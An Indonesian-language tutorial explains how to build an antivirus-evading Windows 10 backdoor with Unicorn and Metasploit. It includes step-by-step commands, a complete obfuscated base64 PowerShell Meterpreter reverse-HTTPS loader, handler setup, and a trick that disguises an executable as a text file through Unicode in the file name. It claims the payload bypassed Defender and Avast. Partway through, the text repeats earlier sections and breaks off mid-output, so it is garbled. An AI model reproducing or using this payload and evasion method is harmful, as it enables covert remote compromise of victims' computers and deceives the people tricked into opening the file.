Cara Membuat Playload Tidak Terdeteksi Untuk Melewati Perangkat Lunak Antivirus
Peretas selalu mencarieksploitasi zero-day yang berhasil melewati fitur keamanan Windows 10. Ada banyak penelitian untuk menciptakan malware yang tidak terdeteksi dan seluruh proyek GitHub yang didedikasikan untuk mengotomatisasi pembuatan muatan yang tidak terdeteksi seperti WinPaylods, Veil v3, dan TheFatRat.
Dengan sedikit rekayasa sosial, mengelabui pengguna target untuk membuka file berbahaya dapat sesederhana menyuntikkan sedikit Unicode ke dalam nama file. Sebagai contoh GIF di bawah ini menunjukkan Windows executable (EXE) yang disamarkan untuk muncul sebagai file teks normal (TXT) bahkan dengan "Sembunyikan ekstensi untuk jenis file yang dikenal "dinonaktifkan dalam Opsi File Explorer.
Jangan salah, file di sebelah kanan dapat dieksekusi dan yang lebih penting dikenali oleh sistem operasi Windows sebagai dapat dieksekusi. Ketika file teks palsu diklik, akan membuka dokumen baru menggunakan Notepad, editor teks default pada Windows 10. Setelah membuka Notepad, diam-diam mengeksekusi payload PowerShell tertanam (dibuat dengan Unicorn) yang menciptakan backdoor ke komputer Windows sekarang dikompromikan.
Unicorn dibuat olehTrustedSec adalah alat sederhana yang dirancang untuk membantu penguji penetrasi dengan serangan downgrade PowerShell dan menyuntikkan muatan shellcode canggih langsung ke memori. Teknik yang digunakan oleh Unicorn didasarkan pada karya Matthew Graeber dan pendiri TrustedSec, David Kennedy .
Berikut ini langkah-langkahnya:
Langkah 1
Instal Kerangka Metasploit
Metasploit adalah ketergantungan Unicorn. Sebelum menginstal Unicorn saya akan segera memandu pembaca melalui instalasi Metasploit untuk memastikannya benar-benar diperbarui menggunakan repositori GitHub.
Kali melakukan pekerjaan yang sangat baik untuk mempertahankan versi stabil Metasploit tetapi saya akan menunjukkan cara menginstal versi terbaru. Pertama, hapus semua versi Metasploit versi lama yang mungkin sudah dipra-instal di Kali.
apt-get remove metasploit-framework
Kemudian, gunakan cURL untuk mengunduh pemasang Metasploit.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Tingkatkan izin file msfinstall yang baru dibuat untuk memastikannya akan dieksekusi di Kali.
chmod 755 msfinstall
Kemudian, jalankan skrip pemasang dengan ./msfinstall .
./msfinstall Adding metasploit-framework to your repository list..OK Updating package cache..OK Checking for and installing update.. Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: metasploit-framework 0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded. Need to get 161 MB of archives. After this operation, 377 MB of additional disk space will be used. Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB] Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB] Fetched 65.7 MB in 11min 39s (93.9 kB/s) Selecting previously unselected package metasploit-framework. (Reading database ... 145965 files and directories currently installed.) Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ... Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ... Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ... update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode Run msfconsole to get started W: --force-yes is deprecated, use one of the options starting with --allow instead.
Ketika installer selesai, akan ada direktori metasploit-framework / baru di direktori / opt.
Langkah 2
Instal Unicorn
Dengan instalasi Metasploit, repositori GitHub Unicorn dapat dikloning menggunakan git clonegithub.com/trustedsec/unicorn .
git clone https://github.com/trustedsec/unicorn Cloning into 'unicorn'... remote: Counting objects: 340, done. remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340 Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done. Resolving deltas: 100% (215/215), done.
Kemudian, ubah ke direktori Unicorn baru menggunakan perintah cd.
cd unicorn/
Untuk melihat opsi Unicorn yang tersedia dan uraian lengkap setiap serangan, gunakan argumen ./unicorn.py --help .
./unicorn.py --help -------------------- Magic Unicorn Attack Vector v3.1 ----------------------------- Native x86 powershell injection attacks on any Windows platform. Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Credits: Matthew Graeber, Justin Elze, Chris Gates Happy Magic Unicorns. Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde CRT Example: python unicorn.py <path_to_payload/exe_encode> crt Custom PS1 Example: python unicorn.py <path to ps1 file> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500 Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format) Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00) Help Menu: python unicorn.py --help
Ada beberapa opsi Unicorn yang menarik dan efektif. Dalam artikel ini saya akan berfokus pada solusi PowerShell dan Meterpreter.
Langkah 3
Hasilkan Payload
Untuk membuat payload dengan Unicorn, gunakan perintah di bawah ini.
./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>
Unicorn akan menggunakan modul Metasploit reverse_https untuk terhubung ke alamat IP penyerang menggunakan port yang ditentukan.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode... ,/ // ,// ___ /| |// `__/\_ --(/|___/-/ \|\_-\___ __-_`- /-/ \. |\_-___,-\_____--/_)' ) \ \ -_ / __ \( `( __`\| `\__| |\)\ ) /(/| ,._____., ',--//-| \ | ' / / __. \, / /,---| \ / / / _. \ \ `/`_/ _,' | | | | ( ( \ | ,/\'__/'/ | | | \ \`--, `_/_------______/ \( )/ | | \ \_. \, \___/\ | | \_ \ \ \ \ \ \_ \ \ / \ \ \ \._ \__ \_| | \ \ \___ \ \ | \ \__ \__ \ \_ | \ | | \_____ \ ____ | | | \ \__ ---' .__\ | | | \ \__ --- / ) | \ / \ \____/ / ()( \ `---_ /| \__________/(,--__ \_________. | ./ | | \ \ `---_\--, \ \_,./ | | \ \_ ` \ /`---_______-\ \\ / \ \.___,`| / \ \\ \ \ | \_ \| \ ( |: | \ \ \ | / / | ; \ \ \ \ ( `_' \ | \. \ \. \ `__/ | | \ \ \. \ | | \ \ \ \ ( ) \ | \ | | | | \ \ \ I ` ( __; ( _; ('-_'; |___\ \___: \___: aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Happy Magic Unicorns. [********************************************************************************************************] -----POWERSHELL ATTACK INSTRUCTIONS---- Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute. Note that you will need to have a listener enabled in order to capture the attack. [*******************************************************************************************************] [*] Exported powershell output code to powershell_attack.txt. [*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
Ketika Unicorn selesai membuat payload, 2 file baru akan dibuat. Yang pertama adalah powershell_attack.txt yang dapat dilihat menggunakan perintah catpowershell_attack.txt. Ini mengungkapkan kode PowerShell yang akan dijalankan pada mesin target Windows 10 dan membuat sambungan meterpreter.
cat powershell_attack.txt powershell /w 1 /C "s''v Mx -;s''v CV e''c;s''v nU ((g''v Mx).value.toString()+(g''v CV).value.toString());powershell (g''v nU).value.toString() ('JAB0AFQAVgAgAD0AIAAnACQAYwBnACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAWABkACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBnACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHQAVAAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA'+'MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAFYAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQBsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAJABFAGQAIgA7AH0A')"
File lain yang dibuat oleh Unicorn adalah unicorn.rc, file sumber daya yang akan mengotomatisasi konfigurasi dan konfigurasi msfconsole.
Langkah 4
Mulai Msfconsole Menggunakan File Sumber Daya
Untuk memulai Metasploit, jalankan perintah msfconsole -r /opt/unicorn/unicorn.rc.
msfconsole -r /opt/unicorn/unicorn.rc =[ metasploit v4.16.59-dev- ] + -- --=[ 1769 exploits - 1008 auxiliary - 307 post ] + -- --=[ 537 payloads - 41 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /opt/unicorn/unicorn.rc for ERB directives. resource (/opt/unicorn/unicorn.rc)> use multi/handler resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5 LHOST => 192.168.1.5 resource (/opt/unicorn/unicorn.rc)> set LPORT 443 LPORT => 443 resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false ExitOnSession => false resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true EnableStageEncoding => true resource (/opt/unicorn/unicorn.rc)> exploit -j [*] Exploit running as background job 0. [-] Handler failed to bind to 192.168.1.5:443 msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
File sumber daya akan secara otomatis mengaktifkan handler ( multi / handler ), mengatur jenis payload ( windows / meterpreter / reverse_https ), mengatur alamat IP penyerang ( LHOST ), mengatur nomor port ( LPORT ), mengaktifkan pengkodean stager (EnableStageEncoding ), dan mulai pendengar msfconsole (mengeksploitasi -j ) - mudah.
Pada titik ini, semua yang ada di sisi penyerang diatur dan siap untuk koneksi yang masuk. Sekarang hanya masalah memverifikasi payload bekerja dan secara efektif melewati Windows Defender danperangkat lunak antivirus.
Langkah 5
Uji Payload (Jangan Mengunggahnya ke VirusTotal)
Dalam pengujian saya, payload PowerShell Unicorn mampu melewati Google Chrome, Windows Defender, dan deteksi antivirus Avast di mesin Windows 10 Enterprise yang sepenuhnya ditambal.
Banyak proyek memperingatkan penguji penetrasi bahaya menggunakan pemindai virus online sepertiVirusTotal. Dalam kasus TheFatRat, pengembang secara eksplisit memperingatkan untuk tidak menggunakan VirusTotal setiap kali program dimulai.
Sebagai seseorang yang secara teratur bereksperimen dengan banyak perangkat lunak penghindaran antivirus, saya sepenuhnya memahami godaan untuk mengetahui apakah payload yang dibuat akan menghindari deteksi
Dengan sedikit rekayasa sosial, mengelabui pengguna target untuk membuka file berbahaya dapat sesederhana menyuntikkan sedikit Unicode ke dalam nama file. Sebagai contoh GIF di bawah ini menunjukkan Windows executable (EXE) yang disamarkan untuk muncul sebagai file teks normal (TXT) bahkan dengan "Sembunyikan ekstensi untuk jenis file yang dikenal "dinonaktifkan dalam Opsi File Explorer.
Unicorn dibuat olehTrustedSec adalah alat sederhana yang dirancang untuk membantu penguji penetrasi dengan serangan downgrade PowerShell dan menyuntikkan muatan shellcode canggih langsung ke memori. Teknik yang digunakan oleh Unicorn didasarkan pada karya Matthew Graeber dan pendiri TrustedSec, David Kennedy .
Berikut ini langkah-langkahnya:
Langkah 1
Instal Kerangka Metasploit
Metasploit adalah ketergantungan Unicorn. Sebelum menginstal Unicorn saya akan segera memandu pembaca melalui instalasi Metasploit untuk memastikannya benar-benar diperbarui menggunakan repositori GitHub.
Kali melakukan pekerjaan yang sangat baik untuk mempertahankan versi stabil Metasploit tetapi saya akan menunjukkan cara menginstal versi terbaru. Pertama, hapus semua versi Metasploit versi lama yang mungkin sudah dipra-instal di Kali.
apt-get remove metasploit-framework
Kemudian, gunakan cURL untuk mengunduh pemasang Metasploit.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Tingkatkan izin file msfinstall yang baru dibuat untuk memastikannya akan dieksekusi di Kali.
chmod 755 msfinstall
Kemudian, jalankan skrip pemasang dengan ./msfinstall .
./msfinstall Adding metasploit-framework to your repository list..OK Updating package cache..OK Checking for and installing update.. Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: metasploit-framework 0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded. Need to get 161 MB of archives. After this operation, 377 MB of additional disk space will be used. Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB] Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB] Fetched 65.7 MB in 11min 39s (93.9 kB/s) Selecting previously unselected package metasploit-framework. (Reading database ... 145965 files and directories currently installed.) Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ... Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ... Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ... update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode update-alternatives: using 